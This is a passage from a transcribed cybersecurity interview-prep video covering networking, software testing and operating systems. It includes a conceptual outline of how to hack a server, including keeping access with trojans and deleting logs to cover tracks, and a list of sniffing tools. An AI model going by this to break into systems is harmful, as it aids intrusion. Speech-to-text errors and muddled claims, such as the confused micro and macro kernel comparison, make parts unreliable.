So that the packet can be routed to the correct computer and be received by the recipient so the tcp model is the compressed version of the osi the seven layers will get converted into four layers the network access layer internet layer transport layer and application layer going on to question eight
What do you mean by ipconfig and ifconfig both of these are commands the first one on a windows machine the second one on a linux machine so ipconfig is known as the internet protocol configuration this is a command that is used on the command line interface of microsoft windows to view
All the adapters and the configuration of each and every adapters for their network interfaces so as you can see on the right hand side in the command prompt screen if once you type in the ip config command on the c prompt and press enter it will give you a list of all the
Adapters that are there so you can see wireless lan adapter local area connection the media is disconnected it doesn’t exist at the bottom you will see the wi-fi connection wireless lan adapter and can give you the ip version 6 ip address ipv4 address the subnet mask and the default gateway
So this is the configuration that allows the machine to know on what network it is on what is the default gateway for communicating to the internet what is the subnet mask so how many computers may exist in that particular network and what is the ip address of that specific
Computer so that it can communicate across the network as well ifconfig is the same thing on the linux mac or unix operating system so the command will also give you the list of interfaces and the configuration of each and every interface it is used to configure controller tcp network interface parameters from the
Command line interface it allows you to see the ip address of these network interfaces so here you can see the wlp19s the ipr is being 192 168 43.215 subnet mask being 255.255.255.0 with the broadcast being 192.168.43.255. question nine what is the difference between a domain
And a work group this can be a very interesting question and can be a very lengthy question at the same time a work group is nothing but a decentralized network where you have interconnected multiple machines together and each machine acts in its own individual capacity thinks of itself as a server right
So a decentralized network use every user manages the resources individually on their pc so local users on their own pcs managing the network shares what can be shared from that particular machine what data should be shared should not be shared to whom it can be shared with and so on so forth
It is good if you’ve got a small network a few machines altogether and you want them to interact with minimal management effort right so each computer each user will decide what they want to allow other users to see on that particular network and all of them would be connected over
A lan a local area network either a wireless or a wired one so if you look at your home wi-fi right now that is one of the best examples of having a work group the domain on the other hand is a centralized network model so in a corporate environment whenever you go
There and you got a domain base username and password which when entered onto a particular machine gives you access to the entire network or whatever applications and whatever resources have been allocated to you that is where the domain comes in so it also uses a single sign-on mechanism for
All the resources that are made that are to be made available to you whereas in a work group your local user only meant for that particular computer right so coming back to the domain it is an administrator who is going to manage the entire domain and all of the resources
Connected to the domain the resources could be switches routers servers data stores applications web servers mail exchange servers and so on so forth so all of these are administered by an administrator through the domain it is the most reliable and optimum solution for a large network where multiple users are going to interconnect
And share that data amongst each other right the computer can be connected to any network that means you can be on the internet and through the internet using a vpn you can connect to your corporate network authenticate in and get access to whatever resources you are allowed to
Access whereas in a work group you have to be a part of that network to access that particular network if you change your location you go and connect to another wi-fi you will lose access to your previous wi-fi then the last question for the networking section what is data encapsulation in
Networking data encapsulation refers to the process of adding headers and trailers to the data the data link layer binds each packet into a frame that contains the hardware address of the source and the destination computer so in this example when you’re talking about data encapsulation we have talked about how
Data that has been created by the application layer we’d have a header and a trailer that will give the various informations of where that data needs to be sent so the hardware address which is the mac address comes into the picture and gets added to the header and the ip addresses port numbers
And all of those things would then be added to this uh traders as well so that the data can be then routed to the intended recipient of that particular communication with this we end the first 10 questions in networking and in this video we are going to look at software and
Programming so we’re going to look at the first 10 questions first question being how do you keep a computer secure now this is going to be a very generic question so you want to put your best foot forward and you want to identify the most common methodologies on how you can keep a
Computer secure so when you talk about computers the first thing that you want to talk about is authentication mechanisms where you want multi-factor authentication or two-way authentication to ensure that your accounts are kept secured now if you look at using passwords depending on how passwords are being stored by the
Application uh password attacks can be possible either a brute force attack or a dictionary based attack uh or even password guessing attacks are possible to mitigate those kind of attacks you we need multi-factor authentication to ensure that accounts are kept secure now even if we are using multi-factor
Authentication we also want to look at secure passwords which means that the password is complex enough to withstand most of the common attacks and a brute force attack or a dictionary attack is just not possible so we want to randomize our passwords we want to create a complexity where a password
Meets standards such as me has at least one lowercase one uppercase character has numerics and special characters and is randomized is not based on a dictionary word doesn’t contain usernames email addresses phone numbers or anything that is personal to that particular user third keep regular updates which means
That there will be patches that will be released for the application for the software that you’re utilizing download the patches install them on a regular basis to ensure that you are secured against the most recent attacks that have been identified install a good antivirus could be a internet security suite which
Will have an antivirus intrusion detection system a firewall and will help you protect yourself against ransomwares malwares and any script-based attacks also have a specialized firewall on your system could be a host-based firewall or a network-based firewall to ensure that attacks are kept at a minimum and you
Have your network definitions in place to allow or disallow connections from happening to your devices have anti-phishing softwares installed as well to ensure that you are not getting any spam mails even if you do you are able to identify that and not fall pre or victim to those spam mails
Phishing attacks are generic where they are directed towards individuals and they prey on the gullibility of that particular individual so our nigerian frauds or the lotteries that we win on a regular basis of hundreds of million dollars those messages the emails that we receive they are all phishing emails where uh they’re basically
Prone to victimize the user and then drop them off money or install some malware or do some other malicious activity if you want to enhance encryption about data that you have stored on your devices or on your or that is accessed by your software or being transmitted by your software use encryption
Encrypt your data whether it is at rest whether it is in motion or whether it is at use thus reducing data leakage and data loss possibilities and finally in the foremost secure your dns dns is the domain name server which is utilized by computers to resolve domain names to ip addresses
If a dns poisoning attack is possible where your dns settings have been modified by an attacker and you are redirected to a malicious dns server that server is going to redirect you to another malicious application which may have a malware or a malicious software as a payload
Also you don’t want people to know your dns servers and the queries that you’re making so you want to use secure dns or dns over https to encrypt your dns queries as well so in a nutshell if you follow these eight steps your devices your computers your
Applications are going to be as secure as possible the next question discuss security related aspects between c c plus plus and java now this is an open-ended question it depends on which level you’re giving an interview on but you’re looking at it from a freshers perspective or a less experienced perspective
And thus these are some of the aspects that we want to look at and the comparisons between c c plus plus and java so the five aspects that we are looking at are pointers code translations storage allocation inheritance and overall security are based on cc plus plus and java so when we say
Pointers we are looking at how we are going to uh we are using pointers and stacks and heaps to point to functions and how we exit those functions and how those functions are then recalled into the next function so c supports pointers it is most secure c plus plus also supports point pointers
But it is a little bit less secure than c java it is not supported direct access is given to memory allocation and thus it is the least secure as far as pointers are concerned when we look at code translations c is able to compile but it is not secure
Same with cc plus but in java it does interpreted language and it is abstracted and secured in storage allocation in c we use malloc and uh catalog memory allocation which is less secure because it does not have internal checks on verifying what memory is allocated and
The user input that is being compiled or that is being input to that memory right thus this can allow buffer overflow errors uh to creep in because of the uh non-verification of the input data so it is the least secure in cc plus plus it uses new and delete options and is
Comparatively secure but java uses a garbage collector and thus is the most secure as far as storage allocation is concerned when we talk about inheritance the most secure is ccp plus plus c has no inheritance so it’s not secure in c plus plus it is supported
Thus it is the most secure whereas in java there is multi inheritance that is not supported and does is comparatively secure overall the most secure out of all these based on these five aspects is java the least secure is c and the mid level is c plus plus moving on to
Question 13 what are the different sources of malware now malware stands for malicious software right malware is basically a software that poses as a legitimate software but has a payload of a trojan virus spyware keylogger or some malicious software that is going to have a negative impact on security of your particular device
So the question here is what are the different sources of malware we want to identify the most common sources through which malwares infect end user devices in today’s world and you can start with pop-up ads so most of the websites if you’re visiting untrusted sites if you’re being redirected to sites that
You don’t know about there’ll be a lot of pop-ups coming your way where it says you’re the 1 millionth visitor to this site please click here to download your gift or it will say uh congratulations on winning a particular product for visiting this page and so on so forth
There are some instances where you can see a banner which is flashing at you on top of the page and says that there are eight uh infections that have been identified on your computer click here to download an antivirus to clean the infections so all of these pop-ups
Are there as a social engineering attack as a phishing attack to make gullible people click on those links and download those malwares now the software that is posing as a security software itself can be a malicious software which is going to install a trojan or a virus or a bot
On your machine compromising the security of that machine the second is removable media usbs and humans have a fascination with usb so if you find a usb lying around it’s a free usb you get excited about it and you want to take it home you want to plug it into a
Machine and see what’s on the usb worst case scenario you format it and you’ve got a free usb to utilize higher the capacity the better but that is one of the most easiest way people use malwares to uh to be deployed on unsuspecting users if there is a usb lying around
Why would why would somebody want to forget a usb it’s most likely planted over there as a social engineering attack so that a gullible person is going to pick it up plug it into their device if the device is not secured enough it is going to install the malware right
Then documents and executable files this is where your viruses and all those creeps in so let’s say you’re surfing on the internet you’re looking for a software uh and you find the software on a particular website you do not verify the trustworthiness of that site and you just download and install that
Software now that software could be malware as well does if you’re surfing on the internet you’re downloading files from different locations you have to research the website you have to research the source to ensure that it is trustworthy and only then are you going to download and execute those files thus
Internet downloads as well and when we say internet downloads it’s not just untrustworthy sites we go to torrents uh we go to uh the dark web or the deep web and we are searching for other softwares especially those who are researching security right we always want we are always on the
Lookout of new softwares and we are always on those forums which may not be so much trustworthy and we just download those files and start installing them that is a very bad scenario right so you have to be very careful what you are downloading from the internet your antiviruses your
Anti-fishing mechanisms your threat intelligence mechanisms uh have those uh mechanisms installed and you want to verify where your downloads are coming from then your network connections if it is a p2p connection it is a local area network connection or a metropolitan area network you have to verify whom
Which devices are connected to your machines and you have to validate those connections before you want to trust those devices uh and before you connect to them if you’re on a public wi-fi you probably don’t want to connect to a public wi-fi in the first place then comes email attachments
There are so many attachments that come across in today’s world most of them in a zip format or a rar format some of them come as document files where there are macros hidden within them macros are scripts that are recognized by microsoft office files right and then finally there are these
Malicious advertisements that we find online right uh let it be facebook let it be whatsapp let it be uh any social media platform that you go or even your search engines their job is to display ads their job is not to verify whether the ad is legit or
Not it is for us as consumers to be careful and validate that ad and verify whether it is a genuine ad or not so just don’t start clicking on uh any of the ad trusting uh the platform that you’re on be sure that you are investigating that so these are the most common
Sources of malware and the end user will always get infected by one of these mechanisms moving on to question 14 how does email work now this is a very uh can be a complex question uh but we have to keep it as simple as possible and we have to identify that there are
Uh two servers while both of them either using smtp which is a simple message transfer protocol where in this scenario john wants to send an email thus they’ve got an email client installed on their machine which is connected to the mail exchange server which has a dns server
Which maps the routing and which maps the exchange server and inboxes so when john composes that message and clicks on send john should be connected to a mail exchange server where the email is sent through that particular person’s inbox so john’s inbox will then uh be validated and that
Email will then be sent through the dns server uh through the internet and will be received by the recipient mail server so at this point in time john also requires the recipient’s email address so in this case this is jack so jack something dot something.com would be the email address
So while john is composing uh the two field will have jack’s email address the from field will have john’s email address the subject field will have whatever they want to convey as a message the message body will have the message itself and then when john clicks on send it will go to
Direction server the exchange server will then validate the inbox and identify where that inbox is located for jack and then to the internet it will be sent to the uh to the mail server of jack the mail server will then identify the proper inbox that it now that that email needs
To be sent to and it will store that email in that particular inbox when jack opens their computer and accesses their inbox this email from jon will be already waiting for them and they can respond to it the same way john had sent that email if getting your learning started is half
The battle what if you could do that for free visit scale up by simply learn click on the link in the description to know more moving on to question 15 what are the types of threats a company can face right and this is where your threat modelling comes into the picture so
You’re looking at software as you’re looking at operating systems and the company comes and asks you uh what are the threats that are most likely that a company will face so on a broader scale the threats that a company will always face would be classified as natural threats man-made threats
Technical threats and a supply system threat so a natural threat would be an act of god which is outside the control of human beings could be storms or any natural occurrences like volcanoes thunderstorms flooding earthquakes fire and so on so forth so anything that is natural so it depends on the geographic
Location that you’re in and what kind of climate that area faces and you need to identify the immediate threats and prepare for them so if it is flooding that you’re looking at and you want to look at an office and the possibility of the office getting flooded is real you probably
Want to have uh uh take office at a higher floor so that the threat of flooding is minimized for fire we always have a fire drill where we practice our fire mechanism so that we can evacuate all humans as soon as possible and then worry about the technicalities of it under any
Circumstances under any threats humans will always have the first priority and then everything else comes in manmade threats are where man themselves are a problem so strikes lockouts hackers theft uh war rioting all of those are man-made threats uh which we ourselves cannot be in control of but
We need to plan for them and we need to have a business continuity plan or a disaster equity plan for any of these threats that have been identified then come the technical threats technical could be software bugs operating system bugs application bugs that that come with the applications that we
Have or a hardware failure where a server crashes a hard disk crashes maybe the processor stops working the motherboard stops working ram gets corrupted any of the technical aspects a stopping uh stop functioning does creating a break in the business can come under technical right so uh anything to do with computers
Let’s say a server failing or a patch that is not installed on the particular software those would come under technical threats and then the supply system the supply system are your environmental threats which depart depend on your supply chain field failures what is the supply chain for
The office to function there are a lot of dependencies that office goes through right there are a lot of other vendors that suppose that support and provide critical infrastructure non-critical infrastructure for the office to function for first and foremost electricity without electricity nothing is going to
Be powered on and you’re not going to be able to function so if there is an electricity service provider and if there’s an electric outage that’s that comes under supply system so that’s a supply chain failure where the vendor that provides electricity to you has failed in providing that particular
Service and now you need a business continuity or a disaster recovery plan so you probably have an inverter or you already have a power generator plant that is going to generate your own power and supply to your system right there could be short circuits because of fluctuation in the
Electricity uh maybe the internet service provider fails and your internet caches so you have a backup line for the internet from a different vendor right and so on so forth maybe your hardware vendors who are supplying you servers desktops laptops and whatnot they fail because they feel they are facing a
Strike or they go bankrupt and suddenly you can no longer purchase hardware from your vendor because they no longer are in business so that’s a supply chain failure so any of these systems failing would also come under threats so under a broad category these are the first four threads that you need to
Identify and then you can elaborate by providing more scenarios based on the experiences that you have had towards each and every of these threats so natural threat where you may have had experience where there would have been let’s say flooding or any natural disaster which caused a problem for the continuity of your
Particular business so identify each and every example for each of these threads and provide that as an example in the interview what is black box and white box testing so when you are testing a software or you’re testing your infrastructure there are two different tests that you can conduct the first one
Is a black box the second one is a white box in a black box test there is no knowledge that is shared with the tester so let’s say you’re an ethical hacker and you have been awarded a contract by an organization to test the current application that they have developed now
They are not going to give you any information they are not going to tell you what the application is they just probably give you an ip address and a port number where the application is hosted and now you have to fire in your own queries and try to figure out what
The application is try to gather information see what uh what information can be gathered in the first place and based on that you’re going to figure out your way identify vulnerabilities and see if any of those vulnerabilities can lead to an security incident so without any knowledge zero
Knowledge of the id infrastructure or the source code that’s a black box attack or a black box test a white box test on the other hand is where full knowledge of the iit infrastructure or the source code is shared so the ethical hacker has complete knowledge
And based on the knowledge they are then going to test out the system to see if there are any flaws that they can identify right so why would these two audits be important because the first one a black box audit emulates the attack of a outsider a external hacker sitting outside the
Organization trying to figure their way in whereas a white box attack can emulate the attack of an insider so a disgruntled employee within that organization misusing their access controls or the access rights to make uh unvalidated profits right so somebody’s corrupt who has been bribed who wants to sell out company
Secrets based uh so they’re going to try to find out vulnerabilities try to steal data and try to sell it on the uh gray market right so a white box would emulate a internal attack a black box would emulate an external attack moving on to question 17 what is use case testing
Now use case testing is a functional test and it is also a black box test right what is a functional test it tests the functionality of a particular software once it has been created why is it a black box test because the user doesn’t know what the functionality
Is they just want to find out each and every scenario and try to see what that scenario generates as a response they are not sure whether that is the appropriate response that should be generated or not they’re just trying to find out the response that is going to be generated
After they fire off a query so this technique is used by testers to get the test scenarios to exercise the whole system from start to finish so let’s say it’s a login mechanism for an application right now a user at this point in time the tester since
It’s a black box testing will know that it is a login mechanism they will not know the details of what logging mechanisms are being utilized so they wouldn’t know whether uh input validation is done they wouldn’t know whether output encoding is done they wouldn’t know how the cgi calls are
Being made they will not know how the queries are handled at the server side and how the database is going to treat that particular query so they have no idea whether sql injection attacks are possible and so on so forth so for them with whatever input they are going to try to insert
For that login mechanism that’s a functional black box test the functionality being whether the login mechanism works and based on the type of inputs that are going to put in whether it creates an unwarranted output whether they can bypass the mechanism or they can uh hack into the system because of
Some of the flaws that were left behind right another example here is a software made for users to use for documentation the testers will test all the cases that the user can do so can the user view a document can they add new documents can they edit documents and can they delete documents
So this functionality will depend upon the access controls that have been granted to a particular user so for this particular user the tester at this point in time they would not know whether they’re an administrative user or they’re a regular user they’ll just try to do all of these
And then write the responses saying i was able to view i was able to add i was able to edit and i was able to delete now the result will be then sent to a manager the manager will look at the results and then based on the actual
Access controls that were supposed to be there for this particular user then we’ll try to identify whether this is an acceptable case or whether there were any flaws within this case moving on to question 18 what is static and dynamic testing now this is again in application testing
Static testing is done in an early stage of development life cycle now software development life cycles there are multiple of those what are these life cycles there are different stages in which a application is created and provided to the customer so your first stage would be determining the
Scope of the application determining the hardware requirements for that application then creating a flowchart for that application a functional chart for that application and then maybe start coding then an architect comes in tests the code verifies the code then the testing phase comes in then the security testing
Phase comes in and then the user acceptance testing comes in but in every stage at the very earliest or first stage a static test will always be started to see whatever code has been developed whatever scope has been developed whether that scope is going to be correct or not this
Will include walkthroughs and code review what is a walkthrough a walkthrough is going through documents that have been generated and trying to find faults in the documented journey that has been talk that has been created so far so let’s say somebody has created a workflow or a flowchart for a program how the
Functions are going to be called and how they’re going to be executed so a walkthrough would be where uh all these responsible people will walk through that particular flowchart and find out any flaws within that and then rectify them if there is any code that has already
Been written this code will be reviewed manually and any flaws within that code would then be identified static testing will always be 100 accurate in a very short amount of time because it is immediate uh you have created it and then the expert is going to test it to see whether everything is
Fine or not right it is all about prevention mechanism so since you are doing it at the inception itself if you find any flaw it gets immediately repaired so this is about preventing vulnerabilities from keeping into that application at a later point in time whereas dynamic on the other side is
Done at the end of the development life cycle so you have generated the application everything is ready now you want to do dynamic testing includes functional and non-functional testing functional testing is where the application itself is being tested the functions to see that all the parameters that are given to the application are
Functioning properly non-functional testing would be where security parameters administrative parameters all of them are being verified right this is where your test case scenarios come in and you’re going to test each and every scenario by generating inputs and analyzing the output that the application is going to give you
Dynamic testing is all about cure so here you’re going to identify vulnerabilities report them to the management and the management is then going to figure out a way of patching those vulnerabilities so that they can be mitigated moving on to the next question what are the test levels in software testing so
As far as software testing is concerned there are four test levels module testing integration testing system testing and the final one is acceptance testing so in the testing phase of your development life cycle the first thing is a module test you’re going to check your routines your subroutines your sub
Programs procedures that have been written in a program so all your functions all your mechanisms for that application are going to be tested when you go into integration testing the software may have been integrated with multiple softwares there may be different api calls coming in maybe a third party
Software on which you are depending upon to supply for information so all of these integration of various softwares various apis are tested to ensure that they are functioning properly and there are no flaws errors or mistakes left behind in the integration of all of these softwares then the system testing
Is where the entire system so including the hardware including the software right it starts from the installation so now the software is complete we know which hardware we are going to support for it we start by installing the software and see whether installation is going to be completed properly if there
Are any errors in the installation process itself then once it is installed the performance of that particular application the write speeds the read speeds on the hard disk uh the transaction speeds that the application is capable of the network dependencies that the application may have all of those would come under
System testing and then the acceptance testing which is basically a quality assurance exercise that the application meets the client’s requirements so the client in the first stage would have given the scope of what needs to be achieved in the acceptance testing you’re verifying that that scope has been met and the client requirements
Have been met and you can assure the client about the functionality and the performance of that particular application coming to the last question in this software programs what are the valuable steps to resolve issues while testing so in the previous scenarios when we have started testing now if you find out
When you execute a particular use case and then you find out of law what would be the steps that you would utilize to address those particular flaws in those tests the first step will always be record then you’re going to report it and then you’re going to introduce a
Control process for it so when you say record you’re going to create logs and you’re going to try to resolve all the problems that have happened now when you say resolve you’re not going to recode the application but you’re going to test the system again and again to
Ensure that whatever is being recorded is accurate and all the logs all the error mechanisms all the dumps all of those that have been generated due to this particular log of this particular error are being captured so that they can be reported to the higher level managers so
The next step is once you have eventually accumulated all these logs and records you’re going to report them to the higher level managers who are then going to investigate it and go back to the developers trying to figure out the best way to mitigate those particular flaws so the report writing
Needs also also needs to be accurate uh it needs to be to the point uh it needs to detail what the problem was it will document all the steps that they were that you took all the inputs that you put in and it will also record all the errors and it will also
Record all the mechanisms that were utilized and the errors that were and that report will be given to the higher level managers who can then forward it to the developers who based on those reports can start their troubleshooting and then the control mechanism comes in you’re going to define the issue management process
So this process needs to work in a particular manner where you’re doing a test you’re recording whatever is happening you’re creating a report out of it you’re sending it to the management the management will then take those reports study them take it to the developers the developers will test
Based on their criterias they might interact with the testers at that point in time to identify particular flaws and then they might want to record that application on a developer patch which once installed will mitigate that particular flaw and then it can come back to the testing
Phase again where you can repeat those tests and validate that the flaw is no longer existing so these are the three steps that would be uh utilized for testing purposes and that brings us to the first 10 questions on the software platform in the next video we’ll be looking at
Operating systems and applications the first question is on virtual memory what exactly is virtual memory for a computer we have two types of memory the first is the primary memory which is your random access memory which is also known as a volatile memory and the secondary memory is your hard disk
Where your data is stored permanently but for a computer when it has let’s say a 4gb memory or a ram as in this scenario on your screen it is going to replicate that and is going to create another 4gb of virtual memory on the
Hard disk and it is going to use it in tandem along with the ram so if the ram is insufficient the processor is going to utilize the 4gb of the virtual memory that is created on the hard disk and it is going to swap data from the ram to the hard disk
This can also be known as a page file or a swap file the next question is what are different scheduling algorithms now the context for this question is you’re talking about the profi processor and you’re talking about how processors are going to be fed to the processor and how
The process is going to treat these processes so the first is first come first serve so the process which requests the cpu first gets the cpu allocation first now whenever there are processes that are being run by different applications they make requests for some cpu time
Now in first come first serve the first service or the first process that is going to request some processing time will get that much allocated to them they will run through the process first and the next and the next and so on so forth the second one is the shortest job first
This is the process where the shortest execution time for that process is calculated and that process is selected first for the cpu then there is parity scheduling this scheduler selects the task to work as per priority so there would be some tasks that are marked with high priority
Some would be normal and some would be low so based on this high normal or low priority all the processes will be classified higher priority will be dealt with first then the normal and the least priority the fourth option is multiple level queues where processors are assigned to
A queue based on the specific property like process priority the size of memory etc so it will be classified based on the attributes given to that particular process and multiple queues will be created and then based on the attributes the processes will be processed by the cpu then shortest remaining time the process
Will be allocated to the task which is closest to its completion so or look at it this way the process that will take the least time to complete its processing would be chosen first and then the round robin method where each process comes in turn gets an equal
Share of time so if there are 10 processors each process will be allocated a certain amount of time after which the next process will be processed and so on so forth and it will continue in a round robin fashion till all the processes get executed so in short six different scheduling algorithms
Depending on how you how the operating system deals with it the next question is what are the steps involved in hacking a server or a network so this is more of an ethical hacking question you’re looking at devices and for and the interviewer asks you uh what kind of
Steps are involved what are the activities that you would do in hacking a server or a network now there are no specific steps that you would define because every hack is going to be unique but it has a hack can be classified in five different steps which are quite generic right so the
First step will always always be the recognizance step also known as information gathering phase also known as foot printing or fingerprinting uh depending on what exactly you’re doing but in this phase the attacker gathers all the evidence all the information that is possible about the targets that they want to
Attack so here you’re trying to get to know the victim so you can launch specific attacks towards them you want to identify what operating system they are utilizing what ip addresses mac addresses the versions of the operating systems and applications the patch levels find out vulnerabilities find out whatever information is possible find
Out the information about the person who is using those computers so you can launch social engineering attacks and so on so forth so the first step is all about gathering enough information based on which you can launch further attacks once you have that information comes the second phase which is known as the
Scanning phase this is more of a technical phase so you’re right in the first step you’ve got your ip addresses domain names maybe even network maps and you have identified which devices are available now in the scanning phase you’re going to identify live devices and then you’re going to scan them for
Open ports processors protocols services you’re going to identify vulnerabilities you’re going to enumerate them to identify more information from them thus at this point in time you will have identified a certain set of vulnerabilities or a certain set of security loopholes that you can misuse once you have identified those
You are going to the next step which is the gaining access tip in this you’re actually going to execute your attacks based on the vulnerabilities that you have found and you’re either going to gain access to that particular system by installing a trojan or destroy the system by
Installing a virus or install a spyware or a keylogger whatever you wanted to achieve so in the gaming access phase you would have based on the knowledge that you gain in the first and the second phase you’re going to launch your attacks and you’re going to try to gain access to that particular
Device then the next step is where you’re going to maintain that access now that you have hacked into that device it is not necessary that you will always be able to get access to that device uh suppose you have cracked the password of that particular user and the user
Changes that password after a few days your attack is worthless so what you’re going to do here is you’re going to maintain your access so this is where it is assumed that you want repeated access to that device and thus you’re going to install a keylogger or a
Trojan or some mechanism which will still allow you to get access to that device without the knowledge or the authorization of that particular user and finally the last step is where you’re going to cover your tracks so whatever activity that we have done so far will have created logs and will have created
Information based on which the victim will come to know that they have been compromised and may be able to trace that activity back to you so to prevent the user or the victim from realizing that they have been hacked and to prevent them to discover who has hacked them
You want to cover your tracks by deleting logs and any references that point to that particular activity you’re going to hide the files that you have created so you have installed a trojan or a key logger these will create files and directories you’re going to hide them so that they
Are not discovered you’re going to hide processes that have been created you’re going to try to hide all the activity that you have done so that to conceal the actual attack and preventing the user from realizing that they have been compromised so these are the five steps that will be
Involved in hacking a server network application or any computing device you’ll come across the next question refers to what are the various sniffing tools now this is a network-based attack where you’re trying to capture uh data packets that that have been transmitted over the network and then you’re going
To analyze them to see if you can capture any sensitive information like usernames passwords bank details or any anything of that sort now these tools will also depend on which operating system you’re utilizing for example msn sniffer would work on microsoft operating systems eater cab would be
Based on linux and so on so forth so on the screen you’ll see six different sniffing tools that work on different operating systems wireshark is uh something that is common both on windows and linux it is used to analyze network in detail it is the de facto tool that you will
Come across in most of your ethical hacking trainings in most of your organizations when they want to do data captures now data capturing or packet capturing is not only done by hackers to gather more information but it is also a known troubleshooting technique used by administrators and network administrators to analyze any issues
That may be going on in the network right so while the first tool you see on the screen is wireshark like we stated is available for windows linux uh as well then there is tcp dump which again has the same capability of wireshark but is a command line version whereas wireshark
Also has a gui a graphical user interface tcp dump is available on linux msn sniffer it’s a very old tool uh when we had msn messengers msn messenger is no longer there but microsoft does or did have a microsoft message analyzer tool uh which they have stopped development since 2015
But that’s another tool that is specific for microsoft operating systems from microsoft that can be installed together more information then you’ve got ethercap which is a tool to launch man-in-the-middle attacks data capturing and is is essentially a linux command line based tool then d sniff is another password and
Network capturing tool which can help you capture data packets prominently a linux tool same with iterate this is a graphical tool which will allow you to capture data data traffics and map protocols and identify which ip addresses have been communicating with what essentially all of the tools have similar functionality except that
Some have additional functionality like launching management attacks or capturing or having specific filters that will help you identify and troubleshoot some network issues that you may be facing moving on to the next question what is an operating system now this is a very difficult question to answer because uh
We normally when we want to answer this question we start off with the functionality of an operating system right uh we try to describe what windows does or what linux does or what mac os does and then we are trying to figure out what an operating system is in the
First place but an operating system essentially as the slide says is a software program that provides a platform for computer hardware to communicate and operate with the computer software so it is basically an enabler for human interaction with the hardware that you have if you take the operating system out of the question
It’s just some hardware which cannot interact with you but essentially when you have operating system like microsoft windows or linux or mac you’re essentially essentially installing an instruction set on that particular device which will allow you to interact and manipulate the hardware to do whatever you want that hardware to do
Right essentially when we talk about uh drivers for your various devices like a driver for your lan card or for your sound card or your graphics card which allows you to tweak these cards uh for a functionality right it allows us input and output functions uh for example the basic example you open
Up microsoft office products like microsoft word or excel and you get a gui on the screen which you can interact with you’ve got a keyboard and you type on that keyboard and the computer knows what you’re typing and reflects those actions on the screen by showcasing it on that particular
Excel file or a word file so how does the computer know what to do or what you’re exactly intending to do at this point in time it is all the operating system that is providing you all these services analyzing what your inputs are and then based on the programming it is going to
Execute that and show it to you on the screen right some of the most common commonly used operating system are microsoft windows you have them in desktop as well as server variants unix linux again linux as desktop and servers you’ve got ubuntu and linux red
Hat and so on so forth and then you’ve got mac os for apple related components the next question what is the difference between micro kernel and macro kernel now the first thing we need to know is what is the kernel kernel is the heart of the operating system that
Allows that input and output to happen it allows those drivers to be set up so that the hardware can interact with the software and we can then instruct the software and the hardware both to function in a particular manner so there are two types of kernels micro
Kernels and a macro kernel micro kernel is something that we normally use micro kernels are for operating systems that use processors directly handled by the processor the micro kernel is very small in size uh micro kernel is large because it basically is the entire image of the operating system
The execution for a micro kernel is slow the micro kernel is going to be faster because it is more evolved there’s a lot of programming involved extendability micro kernels are easy to extend micro um micro kernels are hard to extend as far as security is concerned if a micro
Kernel crashes it takes everything down with it the entire operating system is going to crash but in case of a micro kernel it is only that particular process that is going to get affected microkernel there is a lot of coding involved micro kernel less coding is involved examples of micro kernels would
Be simply an oss most popularly used on yesteryear phones nokias if you remember those uh qnx and so on so forth micro kernels your linux or bsd operating systems essentially use macro kernels next question what are the different types of operating systems so as you can see on the screen
Five types of operating systems batched os distributed operating systems time sharing multi-program and real-time what are batched operating systems the computer operator places the jobs coming from input devices into batches so consider this not from a desktop perspective but from a server perspective where these devices are used
By organizations to compute and to crunch some processes that is going to make some business sense out of it so when there are multiple processes coming in multiple jobs that are going to be scheduled a batched os is going to place these jobs in batches and they’re going
To crunch those based on the inputs that have been given by these operators distributed oss where there are multiple computers which are interconnected and are communicating through networks so in a corporate environment you don’t use one single computer to do everything you’ve got a data center and the data center will
Have a cluster of servers where they’re going to share some resources to crunch one particular task right so that’s where your distributed oss come into the picture then you have time sharing oss where you are renting some type so time sharing voices minimizes the response time example in today’s world cloud right uh
You go on to the cloud you have a virtual service over there you schedule something you showed you the job over there it is uh it is executed and for that time being that operating system services your particular request and provides you that particular job any application that you see online that
Is executed for example facebook from a consumer’s perspective could be a time shared experience then multi-programmed os the operating system uses cpu shuttling to separate jobs so you’re scheduling the cpu to complete certain jobs in this particular manner and in real time os the operating system uses maximum time
To critical operations so it identifies uh the priority of these operations it knows the high priority items the medium low priority items and based on that it is going to execute these critical operations and get the job done moving on to the next question what is the difference between logical address space
And physical address space now when you’re looking at address spaces this is where applications come into the picture and when you execute an application it is going to create a particular address in the memory where it is going to create a buffer to store its own information so that it can be
Provided to the processor processed and then can be written back to the application as an output right so as far as definitions are concerned a logical address is generated during running of an application or a program a physical address is a physical address or a physical location on the memory module itself right
Visibility you can view a logical address because it is programmed into a computer so if i’m looking at cc plus and i’m using malloc or memory allocation that’s where the logical address is going to be created where a buffer is going to be created for that program and
Whatever the user input is going to be it’s going to be stored in that buffer but whereas physical addresses are concerned this logical address will be created on a physical store or a physical memory module which will have its own addressing mechanism thus you you can see the
Memory module but you cannot see the specific address on that particular memory module but as far as a logical address is concerned while you’re programming or you’re debugging the application it will show you the logical address that has been created the start point and the end point of the logical
Address that has been created for that particular program it can be shown in a debugging environment right address space logical and physical address is physical like here this case it’s the memory module itself you can access only the physical address on that particular memory because logical addresses can be viewed but you cannot
Access them physically generation uh the logical addresses are generated by the cpu during the processing time whereas physical addresses are generated are computed by the memory management unit or the mmu that you have on your computers and as far as logical addresses they will always be they are variable whereas
The physical address is always going to be constant looking at the next question what is the difference between logical address space and physical active space so moving on from the previous question to this the logical address is a address created by the cpu for the processors that need to be addressed and
That can be stored as a buffer in the physical memory whereas the physical memory itself is going to be a address that is going to be there on the physical part of that memory which is uh which is going to be assigned to it by the mmu then the next question discusses
Uh shells so what shells are used in linux now what is the shell shell is the command line interface that we utilize on a linux machine so the terminal window as we call it is a shell and there are different variations of a shell based on what linux operating
Systems you’re using the desktop operating systems that you use uh or the server operating systems and real in today’s world that you’re going to use normally you will always have a bash shell which is the first shell that you see on the screen known as a bone
Again shell it is a default for linux distribution so as far as end consumers regular consumers are concerned it is always going to be a bash shell a bone-again shell that you’re going to utilize for scripting and to execute regular commands but when it comes to high level programming or it comes to
Specialization tasks then you’ve got the rest of these shells that you can utilize for example the ksh known as a con shell is used for high level programming which supports associative arrays and built-in operations the csh or the c shell has different functionality like spelling corrections and drop controls
The zsh or the z-shell provides unique features like file generation startup files and fish friendly interactive shell which provides features like auto suggestions and configuration so all of these have different functionalities depending on what usage that you have for that particular shell the most common shell like i stated is the bash
Shell that you’ll always come across in your desktop linux operating systems then looking at the next question what are the process states in linux now what is a process process is basically a service that is running for a particular application for an application to function right this process is going to direct user
